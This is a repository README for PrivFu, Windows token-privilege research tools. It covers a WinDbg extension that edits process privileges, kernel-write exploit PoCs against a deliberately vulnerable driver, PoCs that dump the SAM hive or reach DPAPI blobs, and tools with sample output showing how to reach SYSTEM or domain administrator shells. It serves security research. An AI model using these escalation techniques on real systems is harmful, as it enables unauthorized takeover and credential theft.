• Stars
    star
    385
  • Rank 111,464 (Top 3 %)
  • Language
    C#
  • License
    BSD 3-Clause "New...
  • Created almost 3 years ago
  • Updated over 1 year ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

Kernel mode WinDbg extension and PoCs for token privilege investigation.

PrivFu

Kernel mode WinDbg extension and PoCs for testing how token privileges work.

There are notable repository and articles about token privilege abuse such Grzegorz Tworek's Priv2Admin. Codes in this repository are intended to help investigate how token privileges work.

Table Of Contents

ArtsOfGetSystem

Back to Top

Project

This project covers how to get system privileges from high integrity level shell. See README.md for details.

KernelWritePoCs

Back to Top

Project

The purpose of this project is to investigate how attackers abuse arbitrary kernel write vulnerability. All PoCs are written for HackSys Extreme Vulnerable Driver. Most of these PoCs perform to get SYSTEM integrity level by abusing arbitrary kernel write vulnerability and token privileges. Tested on Windows 10 version 1809/1903, but they should work most of Windows 10 theoretically:

PoC Name Description
CreateAssignTokenVariant This PoC performs EoP with SeCreateTokenPrivilege and SeAssignPrimaryTokenPrivilege.
CreateImpersonateTokenVariant This PoC performs EoP with SeCreateTokenPrivilege and SeImpersonatePrivilege.
CreateTokenVariant This PoC performs EoP with SeCreateTokenPrivilege.
DebugInjectionVariant This PoC performs EoP with SeDebugPrivilege. Uses code injection to winlogon.exe at final stage.
DebugUpdateProcVariant This PoC performs EoP with SeDebugPrivilege. Creates SYSTEM process from winlogon.exe with UpdateProcThreadAttribute API at final stage.
RestoreServiceModificationVariant This PoC performs EoP with SeRestorePrivilege. Use HijackShellLib with this PoC.
SecondaryLogonVariant This PoC performs EoP with SeCreateTokenPrivilege and SeImpersonatePrivilege. Uses secondary logon service at final stage.
TakeOwnershipServiceModificationVariant This PoC performs EoP with SeTakeOwnershipPrivilege. Use HijackShellLib with this PoC.
TcbS4uAssignTokenVariant This PoC performs EoP with SeTcbPrivilege. Get System mandatory level shell from medium mandatory level.
TcbS4uImpersonationVariant This PoC performs EoP with SeTcbPrivilege. Performs thread impersonation with S4U logon. Not get high or system integrity level.

PrivEditor

Back to Top

Project

Warning

In some environment, Debug build does not work. Release build is preferred.

PrivEditor is kernel mode WinDbg extension to manipulate token privilege of specific process. This extension makes it easy to configure the token privilege you want to investigate:

0: kd> .load C:\dev\PrivEditor\x64\Release\PrivEditor.dll

PrivEditor - Kernel Mode WinDbg extension for token privilege edit.

Commands :
    + !getps       : List processes in target system.
    + !getpriv     : List privileges of a process.
    + !addpriv     : Add privilege(s) to a process.
    + !rmpriv      : Remove privilege(s) from a process.
    + !enablepriv  : Enable privilege(s) of a process.
    + !disablepriv : Disable privilege(s) of a process.
    + !enableall   : Enable all privileges available to a process.
    + !disableall  : Disable all privileges available to a process.

[*] To see command help, execute "!<Command> help" or "!<Command> /?".

getps Command

This command is to list processes in your target system:

0: kd> !getps /?

!getps - List processes in target system.

Usage : !getps [Process Name]

    Process Name : (OPTIONAL) Specifies filter string for process name.

If you execute this command without any arguments, this command list all processes in your target system as follows:

0: kd> !getps

     PID        nt!_EPROCESS nt!_SEP_TOKEN_PRIVILEGES Process Name
======== =================== ======================== ============
       0 0xfffff805`81233630      0x00000000`00000000 Idle
       4 0xffffd60f`ec068380      0xffffaf00`cec07a40 System
      68 0xffffd60f`f1780480      0xffffaf00`d3b290a0 svchost.exe
      88 0xffffd60f`ec0db080      0xffffaf00`cec0d080 Registry
     324 0xffffd60f`ef342040      0xffffaf00`d0416080 smss.exe
     348 0xffffd60f`f052f100      0xffffaf00`d25d30a0 dwm.exe
     408 0xffffd60f`eca8e140      0xffffaf00`d21bd930 csrss.exe
     480 0xffffd60f`f05a8340      0xffffaf00`d2568670 svchost.exe
     484 0xffffd60f`efcd60c0      0xffffaf00`d06430e0 wininit.exe
     500 0xffffd60f`efd130c0      0xffffaf00`d23100a0 csrss.exe
     580 0xffffd60f`efdc0080      0xffffaf00`d2266630 winlogon.exe

--snip--

If you want to know specific processes, set string filter as follows. The filter works with forward matching and case insensitive:

0: kd> !getps micro

     PID        nt!_EPROCESS nt!_SEP_TOKEN_PRIVILEGES Process Name
======== =================== ======================== ============
    4568 0xffffd60f`f14ed080      0xffffaf00`d3db60a0 MicrosoftEdge.exe
    4884 0xffffd60f`f1647080      0xffffaf00`d3fc17b0 MicrosoftEdgeCP.exe
    4892 0xffffd60f`f1685080      0xffffaf00`d3fc07b0 MicrosoftEdgeSH.exe

getriv Command

This command is to list token privileges of a specific process:

0: kd> !getpriv /?

!getpriv - List privileges of a process.

Usage : !getpriv <PID>

    PID : Specifies target process ID.

To use this command, you need to set a target process ID in decimal format as follows:

0: kd> !getpriv 5704

Privilege Name                             State
========================================== ========
SeShutdownPrivilege                        Disabled
SeChangeNotifyPrivilege                    Enabled
SeUndockPrivilege                          Disabled
SeIncreaseWorkingSetPrivilege              Disabled
SeTimeZonePrivilege                        Disabled

[*] PID                      : 5704
[*] Process Name             : cmd.exe
[*] nt!_EPROCESS             : 0xffffd60f`f141e4c0
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d4a0c0a0

addpriv Command

This command is to add token privilege(s) to a specific process:

0: kd> !addpriv /?

!addpriv - Add privilege(s) to a process.

Usage : !addpriv <PID> <Privilege>

    PID       : Specifies target process ID.
    Privilege : Specifies privilege to enable (case insensitive). Available privileges are following.

        + CreateToken                    : SeCreateTokenPrivilege.
        + AssignPrimaryToken             : SeAssignPrimaryTokenPrivilege.
        + LockMemory                     : SeLockMemoryPrivilege.
        + IncreaseQuota                  : SeIncreaseQuotaPrivilege.
        + MachineAccount                 : SeMachineAccountPrivilege.
        + Tcb                            : SeTcbPrivilege.
        + Security                       : SeSecurityPrivilege.
        + TakeOwnership                  : SeTakeOwnershipPrivilege.
        + LoadDriver                     : SeLoadDriverPrivilege.
        + SystemProfile                  : SeSystemProfilePrivilege.
        + Systemtime                     : SeSystemtimePrivilege.
        + ProfileSingleProcess           : SeProfileSingleProcessPrivilege.
        + IncreaseBasePriority           : SeIncreaseBasePriorityPrivilege.
        + CreatePagefile                 : SeCreatePagefilePrivilege.
        + CreatePermanent                : SeCreatePermanentPrivilege.
        + Backup                         : SeBackupPrivilege.
        + Restore                        : SeRestorePrivilege.
        + Shutdown                       : SeShutdownPrivilege.
        + Debug                          : SeDebugPrivilege.
        + Audit                          : SeAuditPrivilege.
        + SystemEnvironment              : SeSystemEnvironmentPrivilege.
        + ChangeNotify                   : SeChangeNotifyPrivilege.
        + RemoteShutdown                 : SeRemoteShutdownPrivilege.
        + Undock                         : SeUndockPrivilege.
        + SyncAgent                      : SeSyncAgentPrivilege.
        + EnableDelegation               : SeEnableDelegationPrivilege.
        + ManageVolume                   : SeManageVolumePrivilege.
        + Impersonate                    : SeImpersonatePrivilege.
        + CreateGlobal                   : SeCreateGlobalPrivilege.
        + TrustedCredManAccess           : SeTrustedCredManAccessPrivilege.
        + Relabel                        : SeRelabelPrivilege.
        + IncreaseWorkingSet             : SeIncreaseWorkingSetPrivilege.
        + TimeZone                       : SeTimeZonePrivilege.
        + CreateSymbolicLink             : SeCreateSymbolicLinkPrivilege.
        + DelegateSessionUserImpersonate : SeDelegateSessionUserImpersonatePrivilege.
        + All                            : All privileges.

For example, if you want to set SeDebugPrivilege to a specific process, set a target process ID for the first argument and shorten privilege name debug as listed in the help message for second argument as follows:

0: kd> !getpriv 5704

Privilege Name                             State
========================================== ========
SeShutdownPrivilege                        Disabled
SeChangeNotifyPrivilege                    Enabled
SeUndockPrivilege                          Disabled
SeIncreaseWorkingSetPrivilege              Disabled
SeTimeZonePrivilege                        Disabled

[*] PID                      : 5704
[*] Process Name             : cmd.exe
[*] nt!_EPROCESS             : 0xffffd60f`f141e4c0
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d4a0c0a0

0: kd> !addpriv 5704 debug

[>] Trying to add SeDebugPrivilege.
[*] Done.

0: kd> !getpriv 5704

Privilege Name                             State
========================================== ========
SeShutdownPrivilege                        Disabled
SeDebugPrivilege                           Disabled
SeChangeNotifyPrivilege                    Enabled
SeUndockPrivilege                          Disabled
SeIncreaseWorkingSetPrivilege              Disabled
SeTimeZonePrivilege                        Disabled

[*] PID                      : 5704
[*] Process Name             : cmd.exe
[*] nt!_EPROCESS             : 0xffffd60f`f141e4c0
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d4a0c0a0

The privilege name argument is case insensitive.

If you want to add all token privileges at a time, set all as the privilege name argument:

0: kd> !addpriv 5704 all

[>] Trying to add all privileges.
[*] Done.

0: kd> !getpriv 5704

Privilege Name                             State
========================================== ========
SeCreateTokenPrivilege                     Disabled
SeAssignPrimaryTokenPrivilege              Disabled
SeLockMemoryPrivilege                      Disabled
SeIncreaseQuotaPrivilege                   Disabled
SeMachineAccountPrivilege                  Disabled
SeTcbPrivilege                             Disabled
SeSecurityPrivilege                        Disabled

--snip--

rmpriv Command

This command is to remove token privilege(s) from a specific process:

0: kd> !rmpriv /?

!rmpriv - Remove privilege(s) from a process.

Usage : !rmpriv <PID> <Privilege>

    PID       : Specifies target process ID.
    Privilege : Specifies privilege to enable (case insensitive). Available privileges are following.

        + CreateToken                    : SeCreateTokenPrivilege.
        + AssignPrimaryToken             : SeAssignPrimaryTokenPrivilege.
        + LockMemory                     : SeLockMemoryPrivilege.

--snip--

If you want to remove SeChangeNotifyPrivilege, execute this command as follows:

0: kd> !getpriv 352

Privilege Name                             State
========================================== ========
SeShutdownPrivilege                        Disabled
SeChangeNotifyPrivilege                    Enabled
SeUndockPrivilege                          Disabled
SeIncreaseWorkingSetPrivilege              Disabled
SeTimeZonePrivilege                        Disabled

[*] PID                      : 352
[*] Process Name             : cmd.exe
[*] nt!_EPROCESS             : 0xffffd60f`f17c6080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d3468770

0: kd> !rmpriv 352 changenotify

[>] Trying to remove SeChangeNotifyPrivilege.
[*] Done.

0: kd> !getpriv 352

Privilege Name                             State
========================================== ========
SeShutdownPrivilege                        Disabled
SeUndockPrivilege                          Disabled
SeIncreaseWorkingSetPrivilege              Disabled
SeTimeZonePrivilege                        Disabled

[*] PID                      : 352
[*] Process Name             : cmd.exe
[*] nt!_EPROCESS             : 0xffffd60f`f17c6080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d3468770

As !addpriv command, you can remove all token privileges at a time by setting all as the privilege name argument:

0: kd> !rmpriv 352 all

[>] Trying to remove all privileges.
[*] Done.

0: kd> !getpriv 352

Privilege Name                             State
========================================== ========

[*] PID                      : 352
[*] Process Name             : cmd.exe
[*] nt!_EPROCESS             : 0xffffd60f`f17c6080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d3468770

enablepriv Command

This command is to enable token privilege(s) of a specific process:

0: kd> !enablepriv /?

!enablepriv - Enable privilege(s) of a process.

Usage : !enablepriv <PID> <Privilege>

    PID       : Specifies target process ID.
    Privilege : Specifies privilege to enable (case insensitive). Available privileges are following.

        + CreateToken                    : SeCreateTokenPrivilege.
        + AssignPrimaryToken             : SeAssignPrimaryTokenPrivilege.
        + LockMemory                     : SeLockMemoryPrivilege.

--snip--

The first argument is for process ID, and the second is for token privilege name:

0: kd> !getpriv 1932

Privilege Name                             State
========================================== ========
SeShutdownPrivilege                        Disabled
SeChangeNotifyPrivilege                    Enabled
SeUndockPrivilege                          Disabled
SeIncreaseWorkingSetPrivilege              Disabled
SeTimeZonePrivilege                        Disabled

[*] PID                      : 1932
[*] Process Name             : cmd.exe
[*] nt!_EPROCESS             : 0xffffd60f`f17c6080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d4a040a0

0: kd> !enablepriv 1932 timezone

[>] Trying to enable SeTimeZonePrivilege.
[*] Done.

0: kd> !getpriv 1932

Privilege Name                             State
========================================== ========
SeShutdownPrivilege                        Disabled
SeChangeNotifyPrivilege                    Enabled
SeUndockPrivilege                          Disabled
SeIncreaseWorkingSetPrivilege              Disabled
SeTimeZonePrivilege                        Enabled

[*] PID                      : 1932
[*] Process Name             : cmd.exe
[*] nt!_EPROCESS             : 0xffffd60f`f17c6080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d4a040a0

If you tried to enable privilege(s), not added yet, this command adds it automatically:

0: kd> !getpriv 1932

Privilege Name                             State
========================================== ========
SeShutdownPrivilege                        Disabled
SeChangeNotifyPrivilege                    Enabled
SeUndockPrivilege                          Disabled
SeIncreaseWorkingSetPrivilege              Disabled
SeTimeZonePrivilege                        Enabled

[*] PID                      : 1932
[*] Process Name             : cmd.exe
[*] nt!_EPROCESS             : 0xffffd60f`f17c6080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d4a040a0

0: kd> !enablepriv 1932 debug

[*] SeDebugPrivilege is not present.
[>] Trying to add SeDebugPrivilege.
[>] Trying to enable SeDebugPrivilege.
[*] Done.

0: kd> !getpriv 1932

Privilege Name                             State
========================================== ========
SeShutdownPrivilege                        Disabled
SeDebugPrivilege                           Enabled
SeChangeNotifyPrivilege                    Enabled
SeUndockPrivilege                          Disabled
SeIncreaseWorkingSetPrivilege              Disabled
SeTimeZonePrivilege                        Enabled

[*] PID                      : 1932
[*] Process Name             : cmd.exe
[*] nt!_EPROCESS             : 0xffffd60f`f17c6080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d4a040a0

disablepriv Command

This command is to disable token privilege(s) of a specific process:

0: kd> !disablepriv /?

!disablepriv - Disable privilege(s) of a process.

Usage : !disablepriv <PID> <Privilege>

    PID       : Specifies target process ID.
    Privilege : Specifies privilege to enable (case insensitive). Available privileges are following.

        + CreateToken                    : SeCreateTokenPrivilege.
        + AssignPrimaryToken             : SeAssignPrimaryTokenPrivilege.
        + LockMemory                     : SeLockMemoryPrivilege.

--snip--

To use this command, set a target process ID for the first argument and token privilege name for the second argument:

0: kd> !getpriv 1932

Privilege Name                             State
========================================== ========
SeShutdownPrivilege                        Disabled
SeDebugPrivilege                           Enabled
SeChangeNotifyPrivilege                    Enabled
SeUndockPrivilege                          Disabled
SeIncreaseWorkingSetPrivilege              Disabled
SeTimeZonePrivilege                        Enabled

[*] PID                      : 1932
[*] Process Name             : cmd.exe
[*] nt!_EPROCESS             : 0xffffd60f`f17c6080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d4a040a0

0: kd> !disablepriv 1932 debug

[>] Trying to disable SeDebugPrivilege.
[*] Done.

0: kd> !getpriv 1932

Privilege Name                             State
========================================== ========
SeShutdownPrivilege                        Disabled
SeDebugPrivilege                           Disabled
SeChangeNotifyPrivilege                    Enabled
SeUndockPrivilege                          Disabled
SeIncreaseWorkingSetPrivilege              Disabled
SeTimeZonePrivilege                        Enabled

[*] PID                      : 1932
[*] Process Name             : cmd.exe
[*] nt!_EPROCESS             : 0xffffd60f`f17c6080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d4a040a0

enableall Command

This command is to enable all token privilege(s) available for a specific process:

0: kd> !enableall /?

!enableall - Enable all privileges available to a process.

Usage : !enableall <PID>

    PID       : Specifies target process ID.

It works as follows:

0: kd> !getpriv 3792

Privilege Name                             State
========================================== ========
SeShutdownPrivilege                        Disabled
SeChangeNotifyPrivilege                    Disabled
SeUndockPrivilege                          Disabled
SeIncreaseWorkingSetPrivilege              Disabled

[*] PID                      : 3792
[*] Process Name             : cmd.exe
[*] nt!_EPROCESS             : 0xffffd507`aaed9080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffb708`d72ab8a0

0: kd> !enableall 3792

[>] Trying to enable all available privileges.
[*] Done.

0: kd> !getpriv 3792

Privilege Name                             State
========================================== ========
SeShutdownPrivilege                        Enabled
SeChangeNotifyPrivilege                    Enabled
SeUndockPrivilege                          Enabled
SeIncreaseWorkingSetPrivilege              Enabled

[*] PID                      : 3792
[*] Process Name             : cmd.exe
[*] nt!_EPROCESS             : 0xffffd507`aaed9080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffb708`d72ab8a0

disableall Command

This command is to disable all token privilege(s) for a specific process:

0: kd> !disableall /?

!disableall - Disable all privileges available to a process.

Usage : !disableall <PID>

    PID : Specifies target process ID.

This command is equivalent to !disablepriv <PID> all. Works as follows:

0: kd> !getpriv 3792

Privilege Name                             State
========================================== ========
SeShutdownPrivilege                        Enabled
SeChangeNotifyPrivilege                    Enabled
SeUndockPrivilege                          Enabled
SeIncreaseWorkingSetPrivilege              Enabled

[*] PID                      : 3792
[*] Process Name             : cmd.exe
[*] nt!_EPROCESS             : 0xffffd507`aaed9080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffb708`d72ab8a0

0: kd> !disableall 3792

[>] Trying to disable all available privileges.
[*] Done.

0: kd> !getpriv 3792

Privilege Name                             State
========================================== ========
SeShutdownPrivilege                        Disabled
SeChangeNotifyPrivilege                    Disabled
SeUndockPrivilege                          Disabled
SeIncreaseWorkingSetPrivilege              Disabled

[*] PID                      : 3792
[*] Process Name             : cmd.exe
[*] nt!_EPROCESS             : 0xffffd507`aaed9080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffb708`d72ab8a0

PrivilegedOperations

Back to Top

Project

This project is PoCs for sensitive token privileges such SeDebugPrivilege. Currently, released PoCs for a part of them.

Program Name Description
SeAuditPrivilegePoC This PoC tries to create new security event(s) by SeAuditPrivilegePoC. SeAuditPrivilege does not require high integrity level, but this PoC requires administrative privileges at the first execution to install new event source. Additionally, to confirm the result, this PoC may require modification of local security policy setting.
SeBackupPrivilegePoC This PoC tries to dump HKLM\SAM by SeBackupPrivilege.
SeCreatePagefilePrivilegePoC This PoC tries to set pagefile option to specific values by SeCreatePagefilePrivilege.
SeCreateTokenPrivilegePoC This PoC tries to create a elevated token by SeCreateTokenPrivilege.
SeDebugPrivilegePoC This PoC tries to open a handle to winlogon.exe by SeDebugPrivilege.
SeRestorePrivilegePoC This PoC tries to write test file in C:\Windows\System32\ by SeRestorePrivilege.
SeSecurityPrivilegePoC This PoC tries to read the latest security event by SeSecurityPrivilege.
SeShutdownPrivilegePoC This PoC tries to cause BSOD by SeShutdownPrivilege.
SeSystemEnvironmentPrivilegePoC This PoC tries to enumerate system environment by SeSystemEnvironmentPrivilege. Works for UEFI based system only. Due to OS functionality, this PoC does not work for OSes earlier Windows 10 Build 1809.
SeTakeOwnershipPrivilegePoC This PoC tries to change the owner of HKLM:\SYSTEM\CurrentControlSet\Services\dmwappushservice to the caller user account by SeTakeOwnershipPrivilege.
SeTcbPrivilegePoC This PoC tries to perform S4U Logon to be Builtin\Backup Operators by SeTcbPrivilege.
SeTrustedCredManAccessPrivilegePoC This PoC tries to access DPAPI blob by SeTrustedCredManAccessPrivilege.

S4uDelegator

Back to Top

Project

This tool is to perform S4U logon with SeTcbPrivilege. To perform S4U logon with this tool, administrative privileges are required. Currently, a few operations are implemented (more operations will be implemented in future):

C:\dev>S4uDelegator.exe -h

S4uDelegator - Tool for S4U Logon.

Usage: S4uDelegator.exe [Options]

        -h, --help   : Displays this help message.
        -m, --module : Specifies module name.

Available Modules:

        + lookup - Lookup account's SID.
        + shell  - Perform S4U logon and get shell.

[*] To see help for each modules, specify "-m <Module> -h" as arguments.

[!] -m option is required.

lookup Module

This command is to lookup account SID as follows:

C:\dev>S4uDelegator.exe -m lookup -d contoso -u david

[*] Result:
    |-> Account Name : CONTOSO\david
    |-> SID          : S-1-5-21-3654360273-254804765-2004310818-1104
    |-> Account Type : SidTypeUser


C:\dev>S4uDelegator.exe -m lookup -s S-1-5-21-3654360273-254804765-2004310818-500

[*] Result:
    |-> Account Name : CONTOSO\Administrator
    |-> SID          : S-1-5-21-3654360273-254804765-2004310818-500
    |-> Account Type : SidTypeUser


C:\dev>S4uDelegator.exe -m lookup -d contoso -u "domain admins"

[*] Result:
    |-> Account Name : CONTOSO\Domain Admins
    |-> SID          : S-1-5-21-3654360273-254804765-2004310818-512
    |-> Account Type : SidTypeGroup

If you don't specify domain name with -d option, use local computer name as domain name:

C:\dev>hostname
CL01

C:\dev>S4uDelegator.exe -m lookup -u admin

[*] Result:
    |-> Account Name : CL01\admin
    |-> SID          : S-1-5-21-2659926013-4203293582-4033841475-500
    |-> Account Type : SidTypeUser

shell Module

This command is to get interactive shell with S4U logon:

C:\dev>whoami /user

USER INFORMATION
----------------

User Name     SID
============= =============================================
contoso\david S-1-5-21-3654360273-254804765-2004310818-1104

C:\dev>S4uDelegator.exe -m shell -u admin

[>] Target account to S4U:
    |-> Account Name        : CL01\admin
    |-> Account Sid         : S-1-5-21-2659926013-4203293582-4033841475-500
    |-> Account Type        : SidTypeUser
    |-> User Principal Name : (NULL)
[>] Trying to get SYSTEM.
[+] SeDebugPrivilege is enabled successfully.
[>] Trying to impersonate as smss.exe.
[+] SeAssignPrimaryTokenPrivilege is enabled successfully.
[>] Trying to impersonate thread token.
    |-> Current Thread ID : 7140
[+] Impersonation is successful.
[>] Trying to MSV S4U logon.
[+] S4U logon is successful.
[>] Trying to create a token assigned process.

Microsoft Windows [Version 10.0.18362.175]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\dev>whoami /user

USER INFORMATION
----------------

User Name  SID
========== =============================================
cl01\admin S-1-5-21-2659926013-4203293582-4033841475-500

If you want to add token groups, you can specify them comma separated SID values with -e option as follows:

C:\Tools>whoami
contoso\david

C:\Tools>S4uDelegator.exe -m shell -d contoso -u administrator -e s-1-5-18,S-1-5-19

[>] Target account to S4U:
    |-> Account Name        : CONTOSO\administrator
    |-> Account Sid         : S-1-5-21-3654360273-254804765-2004310818-500
    |-> Account Type        : SidTypeUser
    |-> User Principal Name : [email protected]
[>] Group SID to add:
    |-> [VALID] NT AUTHORITY\SYSTEM (SID : S-1-5-18) will be added.
    |-> [VALID] NT AUTHORITY\LOCAL SERVICE (SID : S-1-5-19) will be added.
[>] Trying to get SYSTEM.
[+] SeDebugPrivilege is enabled successfully.
[>] Trying to impersonate as smss.exe.
[+] SeAssignPrimaryTokenPrivilege is enabled successfully.
[+] SeIncreaseQuotaPrivilege is enabled successfully.
[>] Trying to impersonate thread token.
    |-> Current Thread ID : 2660
[+] Impersonation is successful.
[>] Trying to Kerberos S4U logon.
[+] S4U logon is successful.
[>] Trying to create a token assigned process.

Microsoft Windows [Version 10.0.18362.175]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\Tools>whoami
contoso\administrator

C:\Tools>whoami /groups

GROUP INFORMATION
-----------------

Group Name                                     Type             SID                                          Attributes
============================================== ================ ============================================ ===============================================================
Everyone                                       Well-known group S-1-1-0                                      Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                                  Alias            S-1-5-32-545                                 Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators                         Alias            S-1-5-32-544                                 Mandatory group, Enabled by default, Enabled group, Group owner
NT AUTHORITY\NETWORK                           Well-known group S-1-5-2                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users               Well-known group S-1-5-11                                     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization                 Well-known group S-1-5-15                                     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SYSTEM                            Well-known group S-1-5-18                                     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\LOCAL SERVICE                     Well-known group S-1-5-19                                     Mandatory group, Enabled by default, Enabled group
CONTOSO\Group Policy Creator Owners            Group            S-1-5-21-3654360273-254804765-2004310818-520 Mandatory group, Enabled by default, Enabled group
CONTOSO\Domain Admins                          Group            S-1-5-21-3654360273-254804765-2004310818-512 Mandatory group, Enabled by default, Enabled group
CONTOSO\Schema Admins                          Group            S-1-5-21-3654360273-254804765-2004310818-518 Mandatory group, Enabled by default, Enabled group
CONTOSO\Enterprise Admins                      Group            S-1-5-21-3654360273-254804765-2004310818-519 Mandatory group, Enabled by default, Enabled group
Service asserted identity                      Well-known group S-1-18-2                                     Mandatory group, Enabled by default, Enabled group
CONTOSO\Denied RODC Password Replication Group Alias            S-1-5-21-3654360273-254804765-2004310818-572 Mandatory group, Enabled by default, Enabled group, Local Group
Mandatory Label\System Mandatory Level         Label            S-1-16-16384

SwitchPriv

Back to Top

Project

This tool is to enable or disable specific token privileges for a process:

C:\dev>SwitchPriv.exe -h

SwitchPriv - Tool to control token privileges.

Usage: SwitchPriv.exe [Options]

        -h, --help      : Displays this help message.
        -e, --enable    : Specifies token privilege to enable. Case insensitive.
        -d, --disable   : Specifies token privilege to disable. Case insensitive.
        -r, --remove    : Specifies token privilege to remove. Case insensitive.
        -f, --find      : Specifies token privilege to find.
        -p, --pid       : Specifies the target PID. Default specifies PPID.
        -i, --integrity : Specifies integrity level to set.
        -g, --get       : Flag to get available privileges for the target process.
        -s, --system    : Flag to run as "NT AUTHORITY\SYSTEM".
        -l, --list      : Flag to list values for --enable, --disable, --remove and --integrity options.

To list values for --enable, --disable, --remove and --integrity options, execute this tool with --list flag as follows:

C:\dev>SwitchPriv.exe -l

Available values for --enable, --disable, and --remove options:
    + CreateToken                    : Specifies SeCreateTokenPrivilege.
    + AssignPrimaryToken             : Specifies SeAssignPrimaryTokenPrivilege.
    + LockMemory                     : Specifies SeLockMemoryPrivilege.
    + IncreaseQuota                  : Specifies SeIncreaseQuotaPrivilege.
    + MachineAccount                 : Specifies SeMachineAccountPrivilege.
    + Tcb                            : Specifies SeTcbPrivilege.
    + Security                       : Specifies SeSecurityPrivilege.
    + TakeOwnership                  : Specifies SeTakeOwnershipPrivilege.
    + LoadDriver                     : Specifies SeLoadDriverPrivilege.

--snip--

Available values for --integrity option:
    + 0 : UNTRUSTED_MANDATORY_LEVEL
    + 1 : LOW_MANDATORY_LEVEL
    + 2 : MEDIUM_MANDATORY_LEVEL
    + 3 : MEDIUM_PLUS_MANDATORY_LEVEL
    + 4 : HIGH_MANDATORY_LEVEL
    + 5 : SYSTEM_MANDATORY_LEVEL
    + 6 : PROTECTED_MANDATORY_LEVEL
    + 7 : SECURE_MANDATORY_LEVEL

If you want to control privilege for a remote process, specify the target PID as follows. For example, to enable SeUndockPrivilege for PID 7584, execute with --enable option as follows:

C:\dev>SwitchPriv.exe -p 6968 -e undock

[>] Trying to enable SeUndockPrivilege.
    [*] Target PID   : 6968
    [*] Process Name : Notepad
[+] SeUndockPrivilege is enabled successfully.
[*] Done.

To list current token privileges for the target process, execute with --get flag as follws:

C:\dev>SwitchPriv.exe -p 6968 -g

[>] Trying to get available token privilege(s) for the target process.
    [*] Target PID   : 6968
    [*] Process Name : Notepad
[+] Got 5 token privilege(s).

PRIVILEGES INFORMATION
----------------------

Privilege Name                State
============================= =========================
SeShutdownPrivilege           Disabled
SeChangeNotifyPrivilege       EnabledByDefault, Enabled
SeUndockPrivilege             Enabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege           Disabled

[*] Integrity Level : Medium Mandatory Level
[*] Done.

To perform any actions as SYSTEM, set --system flag as follows:

C:\dev>SwitchPriv.exe -p 1140 -g -s

[>] Trying to get available token privilege(s) for the target process.
    [*] Target PID   : 1140
    [*] Process Name : svchost
[>] Trying to get SYSTEM.
[+] Got SYSTEM privilege.
[+] Got 28 token privilege(s).

PRIVILEGES INFORMATION
----------------------

Privilege Name                            State
========================================= =========================
SeAssignPrimaryTokenPrivilege             Disabled
SeLockMemoryPrivilege                     EnabledByDefault, Enabled
SeIncreaseQuotaPrivilege                  Disabled
SeTcbPrivilege                            EnabledByDefault, Enabled
SeSecurityPrivilege                       Disabled
SeTakeOwnershipPrivilege                  Disabled
SeLoadDriverPrivilege                     Disabled
SeSystemProfilePrivilege                  EnabledByDefault, Enabled
SeSystemtimePrivilege                     Disabled
SeProfileSingleProcessPrivilege           EnabledByDefault, Enabled
SeIncreaseBasePriorityPrivilege           EnabledByDefault, Enabled
SeCreatePagefilePrivilege                 EnabledByDefault, Enabled
SeCreatePermanentPrivilege                EnabledByDefault, Enabled
SeBackupPrivilege                         Disabled
SeRestorePrivilege                        Disabled
SeShutdownPrivilege                       Disabled
SeDebugPrivilege                          EnabledByDefault, Enabled
SeAuditPrivilege                          EnabledByDefault, Enabled
SeSystemEnvironmentPrivilege              Disabled
SeChangeNotifyPrivilege                   EnabledByDefault, Enabled
SeUndockPrivilege                         Disabled
SeManageVolumePrivilege                   Disabled
SeImpersonatePrivilege                    EnabledByDefault, Enabled
SeCreateGlobalPrivilege                   EnabledByDefault, Enabled
SeIncreaseWorkingSetPrivilege             EnabledByDefault, Enabled
SeTimeZonePrivilege                       EnabledByDefault, Enabled
SeCreateSymbolicLinkPrivilege             EnabledByDefault, Enabled
SeDelegateSessionUserImpersonatePrivilege EnabledByDefault, Enabled

[*] Integrity Level : System Mandatory Level
[*] Done.

For example, to enable SeChangeNotifyPrivilege, execute with --disable option as follows:

C:\dev>SwitchPriv.exe -p 8520 -d changenotify

[>] Trying to disable SeChangeNotifyPrivilege.
    [*] Target PID   : 8520
    [*] Process Name : Notepad
[+] SeChangeNotifyPrivilege is disabled successfully.
[*] Done.


C:\dev>SwitchPriv.exe -p 8520 -g

[>] Trying to get available token privilege(s) for the target process.
    [*] Target PID   : 8520
    [*] Process Name : Notepad
[+] Got 5 token privilege(s).

PRIVILEGES INFORMATION
----------------------

Privilege Name                State
============================= ================
SeShutdownPrivilege           Enabled
SeChangeNotifyPrivilege       EnabledByDefault
SeUndockPrivilege             Enabled
SeIncreaseWorkingSetPrivilege Enabled
SeTimeZonePrivilege           Enabled

[*] Integrity Level : Medium Mandatory Level
[*] Done.

If you don't specify --pid option, targets parent process of this tool as follows:

C:\dev>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                          State
============================= ==================================== ========
SeShutdownPrivilege           Shut down the system                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled
